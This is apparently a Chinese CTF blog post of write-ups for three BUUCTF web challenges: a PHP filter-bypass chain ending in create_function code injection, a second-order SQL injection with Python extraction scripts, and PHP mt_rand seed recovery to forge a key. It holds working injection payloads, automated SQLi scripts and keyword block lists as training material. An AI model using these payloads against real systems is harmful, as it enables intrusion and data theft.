BUUCTF 5_17-5_19

最新推荐文章于 2022-12-27 15:51:53 发布

XINO丶

最新推荐文章于 2022-12-27 15:51:53 发布

阅读量3.9k

点赞数

分类专栏：笔记文章标签：网络安全 web安全 php python

本文链接：https://blog.csdn.net/qq_52988816/article/details/124866107

版权

笔记专栏收录该内容

17 篇文章 1 订阅

订阅专栏

//刷了一点之前忘记刷的，鸽鸽鸽

[BJDCTF2020]EzPHP

  <?php 
highlight_file(__FILE__); 
error_reporting(0);  
 
$file = "1nD3x.php"; 
$shana = $_GET['shana']; 
$passwd = $_GET['passwd']; 
$arg = ''; 
$code = ''; 
 
echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>"; 
 
if($_SERVER) {  
    if ( 
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']) 
        )   
        die('You seem to want to do something bad?');  
} 
 
if (!preg_match('/http|https/i', $_GET['file'])) { 
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {  
        $file = $_GET["file"];  
        echo "Neeeeee! Good Job!<br>"; 
    }  
} else die('fxck you! What do you want to do ?!'); 
 
if($_REQUEST) {  
    foreach($_REQUEST as $value) {  
        if(preg_match('/[a-zA-Z]/i', $value))   
            die('fxck you! I hate English!');  
    }  
}  
 
if (file_get_contents($file) !== 'debu_debu_aqua') 
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>"); 
 
 
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){ 
    extract($_GET["flag"]); 
    echo "Very good! you know my password. But what is flag?<br>"; 
} else{ 
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!"); 
} 
 
if(preg_match('/^[a-z0-9]*$/isD', $code) ||  
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {  
    die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");  
} else {  
    include "flag.php"; 
    $code('', $arg);  
} ?>  
This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
Aqua is the cutest five-year-old child in the world! Isn't it ?

有点复杂，慢慢看
第一步有个正则匹配

if($_SERVER) {  
    if ( 
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']) 
        )   
        die('You seem to want to do something bad?');  
}

其中 $_SERVER['QUERY_STRING']的返回值为url中?后面的语句 `$ _SERVER[‘QUERY_STRING’]在读取url时并不会对url进行解码，而$_GET[‘x’]`是会进行url解码的，所以我们要把可能出现在黑名单的字符串进行url编码后再传入，根据这一个点我们可以进行绕过

第二步

if (!preg_match('/http|https/i', $_GET['file'])) { 
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {  
        $file = $_GET["file"];  
        echo "Neeeeee! Good Job!<br>"; 
    }  
} else die('fxck you! What do you want to do ?!');

这里正则要求头尾匹配但又不能匹配，这里可以直接在结尾加上%0a即换行符，来进行绕过
第三步

if($_REQUEST) {  
    foreach($_REQUEST as $value) {  
        if(preg_match('/[a-zA-Z]/i', $value))   
            die('fxck you! I hate English!');  
    }  
}

$_REQUEST是所有的GET与POST传的参数，过滤掉字母，这里要怎样绕过呢，根据其特性
变量post值会优先于get，我们只要在get传入变量后，再用post方式传入数字值进行覆盖即可

考点确实多

第四步

 if (file_get_contents($file) !== 'debu_debu_aqua') 
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");

这里的话要包含这个debu_debu_aqua，但根据网页得知，似乎网站似乎没有这个文件，这里要怎样绕过的，这里的话可以用伪协议去绕过

file=data://text/plain,deb%75_deb%75_aq%75a

第五步

if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){ 
    extract($_GET["flag"]); 
    echo "Very good! you know my password. But what is flag?<br>"; 
} else{ 
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!"); 
}

经过sha1加密后的两个参数要一样，但是未加密时要不相等，强碰撞，没有限制字符，可以数组绕过

sh%61na[]=0&p%61sswd[]=0

第六步

if(preg_match('/^[a-z0-9]*$/isD', $code) ||  
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {  
    die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");  
} else {  
    include "flag.php"; 
    $code('', $arg);

应该是最后一步了吧，这里的话想了好久，看到师傅们说的是可以利用creat_function注入
举个例子

<?php
$XINO = create_function('$a, $b','return ($a-$b);');
echo $XINO(2,2);
?>

等价于

<?php
function XINO($a,$b)
{
	return $a+$b;
}
echo afunc(2,2);
?>

可以看到，我们就创建了一个名为XINO的方法，然后对参数进行运算
回到题目，$code参数是可以控制的，这里的话就是一个利用点，我们可以通过给arg赋值来做

，话说回来，我们并没有$code和$arg的参数,应该用extract($_GET["flag"])

extract可以给变量$code和$arg赋值

get_defined_vars()直接输出所有变量

$flag[code]=create_function&$flag[arg]=} var_dump(get_defined_vars())//
提示flag在rea1fl4g.php

这里的//是要注释掉后面的内容，没太搞懂为啥要这样
之后

require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php)

为了绕过关键词还要进行取反操作

/1nD3x.php?file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0A&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&%66%6c%61%67%5b%61%72%67%5d=}require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f))
;//

得到

PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4NCjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+DQo8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIG1heGltdW0tc2NhbGU9MSwgdXNlci1zY2FsYWJsZT1ubyI+DQo8dGl0bGU+UmVhbF9GbGFnIEluIEhlcmUhISE8L3RpdGxlPg0KPC9oZWFkPg0KPC9odG1sPg0KPD9waHANCgllY2hvICLlkqbvvIzkvaDlsYXnhLbmib7liLDmiJHkuobvvJ/vvIHkuI3ov4fnnIvliLDov5nlj6Xor53kuZ/kuI3ku6PooajkvaDlsLHog73mi7/liLBmbGFn5ZOm77yBIjsNCgkkZjRrZV9mbGFnID0gIkJKRHsxYW1fYV9mYWtlX2Y0MTExMWcyMzMzM30iOw0KCSRyZWExX2YxMTE0ZyA9ICJmbGFnezE3ODgwNzMyLWYxZjMtNGM2Yy1hZjU2LThjMzEwYmQxYzgyZn0iOw0KCXVuc2V0KCRyZWExX2YxMTE0Zyk7DQo=

解码

<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<title>Real_Flag In Here!!!</title>
</head>
</html>
<?php
	echo "咦，你居然找到我了？！不过看到这句话也不代表你就能拿到flag哦！";
	$f4ke_flag = "BJD{1am_a_fake_f41111g23333}";
	$rea1_f1114g = "flag{17880732-f1f3-4c6c-af56-8c310bd1c82f}";
	unset($rea1_f1114g);

[网鼎杯2018]Unfinish

经过尝试，发现用户名存在二次注入

采用了一个小点，先猜测sql语句

insert into users (email,username,password) values ('$email','username','password');

为了绕过单引号
绕过方法

0'+ascii(substr(database() from 1 for 1))+'0;

同时也可以使用两次hex编码来进行绕过
第一种脚本

import requests
import logging
import re
from time import sleep

# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)

def search():
    flag = ''
    url = 'http://b52b0533-2f84-4c9b-bd73-e912ab23a59f.node3.buuoj.cn/'
    url1 = url+'register.php'
    url2 = url+'login.php'
    for i in range(100):
        sleep(0.3)#不加sleep就429了QAQ
        data1 = {"email" : "1234{}@123.com".format(i), "username" : "0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}
        data2 = {"email" : "1234{}@123.com".format(i), "password" : "123"}
        r1 = requests.post(url1, data=data1)
        r2 = requests.post(url2, data=data2)
        res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)
        res1 = re.search(r'\d+', res.group())
        flag = flag+chr(int(res1.group()))
        print(flag)
    print("final:"+flag)

if __name__ == '__main__':
    search()

第二种脚本

import requests

login_url='http://220.249.52.133:39445/login.php'
register_url='http://220.249.52.133:39445/register.php'
content=''
for i in range(1,20):
    data_register={'email':'15@%d'%i,'username':"0'+( substr(hex(hex((select * from flag ))) from (%d-1)*10+1 for 10))+'0"%i,'password':'1'}
    #print(data)
    data_login={'email':'15@%d'%i,'password':'1'}
    requests.post(register_url,data=data_register)
    rr=requests.post(login_url,data=data_login)
    rr.encoding='utf-8'
    r=rr.text
    location=r.find('user-name')
    cont=r[location+17:location+42].strip()
    content+=cont
    print(cont)
#content=content.decode('hex').decode('hex')
print(content)

MRCTF2020]Ezaudit

源码泄露 www.zip

<?php 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥，咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

简单看一眼，传用户名密码私钥，
username= ‘crispr’ 已经固定，我们无法再改，密码可控，我们可以尝试万能密码，重点在怎样用公钥求私钥

  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }

根据私钥加密算法会发现随机数的生成用了mt_rand函数，该地方存在一个伪随机数的问题
用固定脚本去跑一下

str1 ='KVQP0LdJKRaV3n9D'
str2 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
result =''



length = str(len(str2)-1)
for i in range(0,len(str1)):
    for j in range(0,len(str2)):
        if str1[i] ==  str2[j]:
            result += str(j) + ' ' +str(j) + ' ' + '0' + ' ' + length + ' '
            break



print(result)

用工具php_mt_seed跑出来
seed = 0x69cf57fb = 1775196155 (PHP 5.2.1 to 7.0.x; HHVM)

加密

<?php
mt_srand(1775196155);
//公钥
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
}
//私钥
function private_key($length = 12) {
    
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
public_key();
echo private_key();
?>

得到
XuNhoueCDCGc

在登录界面填上就行